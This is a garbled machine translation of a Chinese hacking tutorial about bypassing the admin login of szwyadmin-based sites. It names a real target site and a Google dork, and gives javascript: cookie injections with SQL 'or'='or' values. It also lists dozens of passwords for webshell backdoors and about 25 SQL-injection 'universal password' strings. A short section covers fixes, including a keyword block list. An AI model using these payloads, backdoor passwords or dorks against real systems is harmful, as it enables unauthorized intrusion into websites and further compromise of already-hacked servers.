First, I declare that we should stand by our conscience. We should not do anything about it. We will only explain a technology against the sky. If you do anything about it, you will be responsible for it. It has nothing to do with me!
Remember two points when completing vulnerabilities: 1. Whether you trust security or not; 2. Whether you trust security or not.
See the text: (szwyadmin vulnerability: Intrusion using cookies and universal passwords) Google: inurl: szwyadmin/login. ASP for example, I in the search site selected this site http://www.jsxzxy.com/szwyadmin/login.asp intrusion code :( copy, put in the address bar, will play 2 warning box, click OK OK) javascript: Alert (document. cookie = "adminuser =" + escape ("'or' = 'or'"); javascript: Alert (document. cookie = "adminpass =" + escape ("'or' = 'or'") Replacement code: Code 2: admin_index.asp now the WebSite becomes a http://www.jsxzxy.com/szwyadmin/admin_index.asp so that we can enter the invasion of the website is like this, in fact, this is the use An application that combines universal passwords and cookies is essentially caused by inadequate universal password filtering!
Practice:
---------- The lazy directly bypasses it. The following is an explanation. The previous section has already completed ---------- [anti-day explanation:] JavaScript escape () function [Here we use this function to trick the website into verification] defines and uses the escape () function to encode the string so that it can be read on all computers. The description string of the syntax escape (string) parameter is required. The string to be escaped or encoded. Returns a copy of The encoded string. Some characters are replaced with hexadecimal escape sequences. This method does not encode ASCII letters and numbers or the following ASCII punctuation marks: * @-_ + ./. All other characters are replaced by escape sequences. Tip and note: You can use Unescape () to decode the escape () encoded string. Note: ecmascript V3 rejects this method. The application uses decodeuri () and decodeuricomponent () to replace it. In this example, we use escape () to encode the string: <SCRIPT type = "text/JavaScript"> document. Write (escape ("Visit w3school! ") +" <Br/> ") document. Write (escape ("?! = () # % & ") </SCRIPT> output: [is it effective to cheat our eyes ?] Visit % 20w3school % 21% 3f % 21% 3D % 28% 29% 23% 26 [tracing origin] fix that is to re-filter the universal password. You cannot always fix the vulnerability only, the previous repair method for keywords such as or should also be limited (recommended against the day): Method 1: Replace filter character [A scam is over...] Solution: Find login. username = request. form ("name") pass = request. modify form ("pass") to: username = Replace (request. form ("name"), "'", "'' ") pass = Replace (request. form ("pass"), "'", "'' ") syntax shields' and'' characters to achieve the effect. method 2: In Conn. ASP) Save the following code as safe. ASP program code [not added or] <% dim query_badword, form_badword, I, err_message, err_web, name err_message = 3 err_web = javassafe.htm "'page to be switched when an error occurs query_badword ="' | and | select | update | CHR | Delete | % 20from |; | insert | mid | master. | set | CHR (37) | = "'illegal get parameter defined in this section. Use" | "interval form_badword ="' | (|) |; | = "'illegal post parameter is defined in this part. Use" | "to separate on error resume next if request. querystring "" Then chk_badword = Split (query_badword, "|") for each query_name in request. querystring for I = 0 to ubound (chk_badword) If instr (lcase (request. querystring (query_name), chk_badword (I) 0 then select case err_message case "1" response. W Rite "Alert ('parameter passing error! The value of the parameter "& name &" contains an invalid string! \ N do not include invalid characters such as: and update Delete; insert mid master in the parameter! '); Window. close (); "case" 2 "response. write "location. href = '"& err_web &"' "case" 3 "response. write "Alert ('parameter passing error! The value of the parameter "& name &" contains an invalid string! \ N do not include invalid characters such as: and update Delete; insert mid master in the parameter! '); Location. href = '"& err_web &"'; "end select response. end end if next end if request. form "" Then chk_badword = Split (form_badword, "|") for each name in request. form for I = 0 to ubound (chk_badword) If instr (lcase (request. form (name), chk_badword (I) 0 then select case err_message case "1" response. write "Alert ('error! The value of Form "& name &" contains an invalid string! \ N your illegal operations have been recorded. Please stop the illegal activities immediately! '); Window. close (); "case" 2 "response. write "location. href = '"& err_web &"' "case" 3 "response. write "Alert ('error! The value of the parameter "& name &" contains an invalid string! \ N \ Thank you for coming !, Please stop illegal behavior! '); Location. href = '"& err_web &"'; "end select response. end end if next end if %> [extended: the universal password of the popular ASP horse backdoor in China and the previous universal password]
These Trojans are basically popular ASP Trojans in China. If you find these Trojans on the Japanese site, you can try these passwords, some of which are universal passwords collected, some are the default passwords, and some others are sent to me. I will post them all to you: black Feather base no kill ASP Trojan password 5201314asp webmaster assistant 6.0 password 584521web comprehensive security assessment-beta3 password nohack unknown x password 45189946 Baidu} "password Baidu Lu Yao Zhi horsepower password 123 hacker website home beautify version password chenxueth, end. login Password and QQ: 913720787 smile Buddha world password CNOT Xiyu Xiaogang-Webmaster assistant-Modify version password xxoxxxxxxx password rinima dark group super function Amendment to the backdoor strengthen S-U elevation of authority version password hkk007 hackers official-Long-term website provision **, password cracking database ** password: chengnuoaspadmin_a password "5556661221" 123456 Firefox ASP Trojan (super strong version) "password W RSK rain night lone soul password 54321 dark security team password yuemo wind free tears password jcksyes great farmer password 521mr. con ASP pony password ******* jspx password 4lert Special Edition password yuemomaek dream password hackershell password XXXXX ghost ◆ security team + "password 10011c120105101 galaxy security network password fclsharkaspxspy password 19880118 dark Password 376186027no backdoor webshell (knife) password admin Black Warrior shell warrior version password 654321 Xiao Wu comes password 535039 edevil sadness password adminf. s.t Internal Communication Group version !!! Do not pass out the password 000. dedicated password 123 Windows Password 123 [D. s. t] member-specific webshell password darkst I want to go in 'password jcksyeshacker' rose password 123456 tear-off password jcksyesf. s.t pirate internal edition .! Do not pass it out. By Pirate password jinjinwebshell 6.0 VIP (password cracking protection password 12345 jfeng password sq19880602edevil sadness password jtk2352 Remote Control horsepower password sq19880602 Olympic special version website maintenance tool (enhanced version) password killedu hacker official password chengnuo unknown x password 45189946 heartbeat ASP super privilege correction enhanced version 20080124 password 1233212010 New Year version free kill webshell password adminmichael, t dedicated ASP Privilege Escalation Trojan password hackeredevil sadness password Admin evil force uncle ice chrysanthemum password admin [hackyong] Final Version password haode sesame open door password chuangaiezu password 981246 Xiao file management password et520password: password winner cold-blooded password 12 Olympic special version website maintenance tool (enhanced password 20080808b Y: Air password yrpx dark group super powerful function Amendment to the backdoor strengthen S-U Elevation of Privilege version of the password hkk007 Firefox ASP Trojan (super strong version) "China fifth anniversary celebration version of the password wrsk (China Data) password rinimaasp hacker → kissy password ceshi2009edevil sadness password 5201314f. s.t Internal Communication Group version .! Do not pass out password rfklusername password 847381979 this is an era without faith password Jing Wei password winner desert smoke password 4816535 to interpret the myth of the bar 'password zhacksam, ASP modified enhanced version QQ: 42466841 password mama520fuck you password 123go xiaowu comes password 1366ki-"password 1 login password 888999e. v. a. V dedicated network horse "modified version" password 13572468 month west floor password Sasa egg webshell mouse enhanced version password Dangdang yuan to ④ your special version free kill ASP horse password lovehack7758f. s.t Internal Communication Group version .! Do not pass out Oh password rfkl dark group super powerful function Amendment to the backdoor to strengthen the S-U privilege version of the password 12380sec internal dedicated to the world to kill soft off product minimum function super fierce universe first ASP hkmmg. XP dedicated password 133135136 Satan password 1992724f. s.t Internal Communication Group version !!! Do not pass it out !!! Password yongedevil sadness password noid understand your taste Password caodan dedicated webshell password 96315001 thinking easy to kill ASP Trojan 3.0 (the latest two) password admintx-network dedicated ASP Trojan password axiaousername password 847381979f. s.t Internal Communication Group version .! ." Password rfklghost permanent no kill ASP Trojan ghost password yuemo encirclement and suppression special version + Password yuemomiracle personal dedicated password 12 Xiao Wu comes password 535039 Tang and Song Yuan Ming and Qing Dynasties "password bzxyd security detection {: network neighbors} | "password tonecan I want to go in" password bzxydedevil sadness password 52013143e security team password 3est simple front and back door password sinf. s.t pirate internal edition .! Do not pass it out. By Pirate password 654321 blue kill password ghosthqzx password Cf. s.t Alliance internal edition !!! Do not pass it out !!!" Password yongwebadmin2 password webadminhqzx's blog password login blue password 5909062xzx red union Prince iolhcw19891209 year old Alliance (? Copyright (c) 2004 Security Angel team [syue] All Rights Reserved .) password hehe 1. asp aspx universal password 1: "or" A "=" A2: ') or ('A' = 'a 3: or 1 = 1-4: 'or 1 = 1-5: a' or '1 = 1-6: "or 1 = 1-7:' or 'A' = 'a8: "or" = "A' = 'a9: 'or'' = '10:' or '=' or '11: 1 or '1' = '1' = 112: 1 or '1' = '1' or 1 = 113: 'or 1 = 1 or '1' = '2017:' or 1 = 114 00 15: "Or 1 = 1% 0016: 'xor 17: username 'Union select, 1 from Admin where'' = '(Replace Table Name Admin) password 118' or '1' = '119: admin' or '1' = '1'-20: or 1 = 1-'21: "or" A "=" A22: 'or ''1' = '1970: admin' or 'A' = 'a password: 24: "or 1 = 123 1%: 'Or 1 = 1% 00 shortest: 'or '1 2. php universal password' or 1 = 1/* User: Something pass: 'or '1' = '1 3. jsp universal password 1' or '1' = '1admin' or 1 = 1 /*
